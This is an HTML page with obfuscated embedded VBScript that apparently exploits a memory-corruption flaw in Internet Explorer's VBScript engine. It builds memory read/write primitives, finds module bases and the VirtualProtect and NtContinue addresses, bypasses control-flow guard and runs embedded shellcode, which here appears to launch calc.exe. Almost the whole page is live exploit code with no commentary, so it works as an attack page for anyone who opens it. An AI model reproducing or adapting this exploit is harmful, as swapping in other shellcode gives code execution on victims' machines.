<!doctype html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=10">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
<script src="/cdn-cgi/apps/head/xGpmLMHiaqCy-agu1ud6fHqKiTo.js"></script></head>
<body>
<script type="text/vbscript">
Dim max_col
Dim index_vul
Dim index_a
Dim index_b
Dim addr
Dim array()
Dim array2(0,6)
Dim util_mem
Dim fake_array
Dim fake_str
Dim NtContinueAddr,VirtualProtectAddr
Class Dummy
End Class
Class MyClass
private Sub Class_Initialize
ReDim array(2)
IsEmpty(array)
End Sub
Public Default Property Get P
ReDim Preserve array(100000)
For i = 0 To UBound(array2,2)
array2(0,i) = 3
Next
For i = 0 To UBound(array)
array(i) = array2
Next
P=&h0fffffff
End Property
End Class
Function LeakVBAddr
Set dm = New Dummy
Set array(index_vul)(index_a+4,0) = dm
array(index_b)(0,4) = CDbl("6.36598737437801E-314")
LeakVBAddr=array(index_vul)(index_a+4,0)
End Function
Function GetBaseByDOSmodeSearch(ArrDll)
Dim TEMPVAL
TEMPVAL=ArrDll And &hffff0000
Do While GetUint32(TEMPVAL+(&h748+4239-&H176f))<>544106784 Or GetUint32(TEMPVAL+(&ha2a+7373-&H268b))<>542330692
TEMPVAL=TEMPVAL-65536
Loop
GetBaseByDOSmodeSearch=TEMPVAL
End Function
Function FND(lIII)
FND=GetUint32(lIII) And (&h17eb+1312-&H1c0c)
End Function
Function StrCompWrapper(lIII,lFNCl)
Dim ArrAI,INDEXTEMP
ArrAI=""
For INDEXTEMP=(&ha2a+726-&Hd00) To Len(lFNCl)-(&h2e1+5461-&H1835)
ArrAI=ArrAI &Chr(FND(lIII+INDEXTEMP))
Next
StrCompWrapper=StrComp(UCase(ArrAI),UCase(lFNCl))
End Function
Function GetBaseFromImport(base_address,name_input)
Dim import_rva,nt_header,descriptor,import_dir
Dim FNAI
nt_header=GetUint32(base_address+(&h3c))
import_rva=GetUint32(base_address+nt_header+&h80)
import_dir=base_address+import_rva
descriptor=0
Do While True
Dim Name
Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
If Name=0 Then
GetBaseFromImport=&hBAAD0000
Exit Function
Else
If StrCompWrapper(base_address+Name,name_input)=0 Then
Exit Do
End If
End If
descriptor=descriptor+1
Loop
FNAI=GetUint32(import_dir+descriptor*(&h14)+&h10)
GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+FNAI))
End Function
Function FNA(Domain)
lVARF=0
IVARCI=0
IVARFl=0
Id=CLng(Rnd*1000000)
lVARF=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
If(Id+lVARF)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
lVARF=lVARF-(&h86d+6447-&H219b)
End If
IVARCI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
IVARFl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
FNA=Domain &"?" &Chr(IVARCI) &"=" &Id &"&" &Chr(IVARFl) &"=" &lVARF
End Function
Function FNB(ByVal FNCl)
IIll=""
For index=0 To Len(FNCl)-1
IIll=IIll &FNC(Asc(Mid(FNCl,index+1,1)),2)
Next
IIll=IIll &"00"
If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
IIll=IIll &"00"
End If
For INDEXTEMP=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
lArrB=Mid(IIll,INDEXTEMP*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
FNCll=Mid(IIll,INDEXTEMP*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
FNB=FNB &"%u" &FNCll &lArrB
Next
End Function
Function FNC(ByVal Number,ByVal Length)
IIII=Hex(Number)
If Len(IIII)<Length Then
IIII=String(Length-Len(IIII),"0") &IIII 'pad allign with zeros
Else
IIII=Right(IIII,Length)
End If
FNC=IIII
End Function
Function IReuseCLASS(lIII)
IReuseCLASS=GetUint32(lIII) And (131071-65536)
End Function
Function GetProcAddr(dll_base,name)
Dim p,export_dir,index
Dim function_rvas,function_names,function_ordin
Dim IVARCl
p=GetUint32(dll_base+&h3c)
p=GetUint32(dll_base+p+&h78)
export_dir=dll_base+p
function_rvas=dll_base+GetUint32(export_dir+&h1c)
function_names=dll_base+GetUint32(export_dir+&h20)
function_ordin=dll_base+GetUint32(export_dir+&h24)
index=0
Do While True
Dim lllI
lllI=GetUint32(function_names+index*4)
If StrCompWrapper(dll_base+lllI,name)=0 Then
Exit Do
End If
index=index+1
Loop
IVARCl=IReuseCLASS(function_ordin+index*2)
p=GetUint32(function_rvas+IVARCl*4)
GetProcAddr=dll_base+p
End Function
Function GetShellcode()
TEMPCODE=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u652e%u6578%u4100%u0065%u0000%u0000%u0000%u0000%u0000%ucc00%ucccc%ucccc%ucccc%ucccc" &FNB(FNA("")))
TEMPCODE=TEMPCODE & String((&h80000-LenB(TEMPCODE))/2,Unescape("%u4141"))
GetShellcode=TEMPCODE
End Function
Function EscapeAddress(ByVal value)
Dim High,Low
High=FNC((value And &hffff0000)/&h10000,4)
Low=FNC(value And &hffff,4)
EscapeAddress=Unescape("%u" &Low &"%u" &High)
End Function
Function lArrDl
Dim INDEXTEMP,IlllI,TEMPCODE,VARFI,VARCI,llIII,lArrD
IlllI=FNC(NtContinueAddr,8)
VARFI=Mid(IlllI,1,2)
VARCI=Mid(IlllI,3,2)
llIII=Mid(IlllI,5,2)
lArrD=Mid(IlllI,7,2)
TEMPCODE=""
TEMPCODE=TEMPCODE &"%u0000%u" &lArrD &"00"
For INDEXTEMP=1 To 3
TEMPCODE=TEMPCODE &"%u" &VARCI &llIII
TEMPCODE=TEMPCODE &"%u" &lArrD &VARFI
Next
TEMPCODE=TEMPCODE &"%u" &VARCI &llIII
TEMPCODE=TEMPCODE &"%u00" &VARFI
lArrDl=Unescape(TEMPCODE)
End Function
Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
Dim TEMPCODE
TEMPCODE=String((100334-65536),Unescape("%u4141"))
TEMPCODE=TEMPCODE &EscapeAddress(ShellcodeAddrParam)
TEMPCODE=TEMPCODE &EscapeAddress(ShellcodeAddrParam)
TEMPCODE=TEMPCODE &EscapeAddress(&h3000)
TEMPCODE=TEMPCODE &EscapeAddress(&h40)
TEMPCODE=TEMPCODE &EscapeAddress(ShellcodeAddrParam-8)
TEMPCODE=TEMPCODE &String(6,Unescape("%u4242"))
TEMPCODE=TEMPCODE &lArrDl()
TEMPCODE=TEMPCODE &String((&h80000-LenB(TEMPCODE))/2,Unescape("%u4141"))
WrapShellcodeWithNtContinueContext=TEMPCODE
End Function
Function ExpandWithVirtualProtect(VirtualProtectAddrFake)
Dim TEMPCODE
Dim VARClI
VARClI=VirtualProtectAddrFake+&h23
TEMPCODE=""
TEMPCODE=TEMPCODE &EscapeAddress(VARClI)
TEMPCODE=TEMPCODE &String((&hb8-LenB(TEMPCODE))/2,Unescape("%4141"))
TEMPCODE=TEMPCODE &EscapeAddress(VirtualProtectAddr)
TEMPCODE=TEMPCODE &EscapeAddress(&h1b)
TEMPCODE=TEMPCODE &EscapeAddress(0)
TEMPCODE=TEMPCODE &EscapeAddress(VirtualProtectAddrFake)
TEMPCODE=TEMPCODE &EscapeAddress(&h23)
TEMPCODE=TEMPCODE &String((&400-LenB(TEMPCODE))/2,Unescape("%u4343"))
ExpandWithVirtualProtect=TEMPCODE
End Function
Function SetMemValue(valkey)
array(index_vul)(index_a+2,0)(util_mem)=3
array(index_vul)(index_a+2,0)(util_mem+8) = valkey
End Function
Function GetMemValue
array(index_vul)(index_a+2,0)(util_mem)=3
GetMemValue=array(index_vul)(index_a+2,0)(util_mem+8)
End Function
Sub ExecuteShellcode
array(index_vul)(index_a+2,0)(util_mem)=&h4d
array(index_vul)(index_a+2,0)(util_mem+8)=0
msgbox(util_mem)
End Sub
Function rw_primit()
array(index_vul)(index_a+2,0)=fake_array
array(index_b)(0,2)=CDbl("1.74088534731324E-310")
array(index_vul)(index_a,0)=fake_str
array(index_b)(0,0)=CDbl("6.36598737437801E-314")
util_mem=array(index_vul)(index_a,0)
End Function
Function read
read=LenB(array(index_vul)(index_a+2,0)(util_mem+8))
End Function
Function GetUint32(addr)
Dim value
array(index_vul)(index_a+2,0)(util_mem+8)=addr +4
array(index_vul)(index_a+2,0)(util_mem)=8
value=read()
array(index_vul)(index_a+2,0)(util_mem)=3
GetUint32 = value
End Function
Set cls = New MyClass
array(2)=cls
IsEmpty(array)
max_col=&h0fffffff
For i=0 To UBound(array)
If UBound(array(i),1)-LBound(array(i),1)+1=max_col Then
index_vul=i
Exit For
End If
Next
For i=0 To UBound(array(index_vul),1)
Dim type1 ,type2 ,type3 ,type4
type1=VarType(array(index_vul)(i,0))
type2=VarType(array(index_vul)(i+1,0))
type3=VarType(array(index_vul)(i+3,0))
type4=VarType(array(index_vul)(i+4,0))
If(type1 = 2 And type2 = 2 And type3 = 3 And type4 = 3) Then
index_a=i+3
array(index_vul)(index_a,0)="AAAA"
Exit For
End If
Next
For i=0 To UBound(array,1)
If array(i)(0,0)=8 Then
index_b=i
Exit For
End If
next
fake_array=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
fake_str=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
rw_primit()
vb_adrr=LeakVBAddr()
'Alert "LeakVBAddr Base: 0x" & Hex(vb_adrr)
vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
'Alert "VBScript Base: 0x" & Hex(vbs_base)
msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
'Alert "MSVCRT Base: 0x" & Hex(msv_base)
krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
'Alert "KernelBase Base: 0x" & Hex(krb_base)
ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
'Alert "Ntdll Base: 0x" & Hex(ntd_base)
VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
'Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr)
NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
'Alert "KernelBase!VirtualProtect NtContinueAddr Address 0x" & Hex(NtContinueAddr)
SetMemValue GetShellcode()
ShellcodeAddr=GetMemValue()+8
'Alert "Shellcode Address 0x" & Hex(ShellcodeAddr)
SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
VirtualProtectAddrFake=GetMemValue()+69596
SetMemValue ExpandWithVirtualProtect(VirtualProtectAddrFake)
ReuseCLASSl=GetMemValue()
'Alert "Executing Shellcode"
ExecuteShellcode()
</script>
</body>
</html>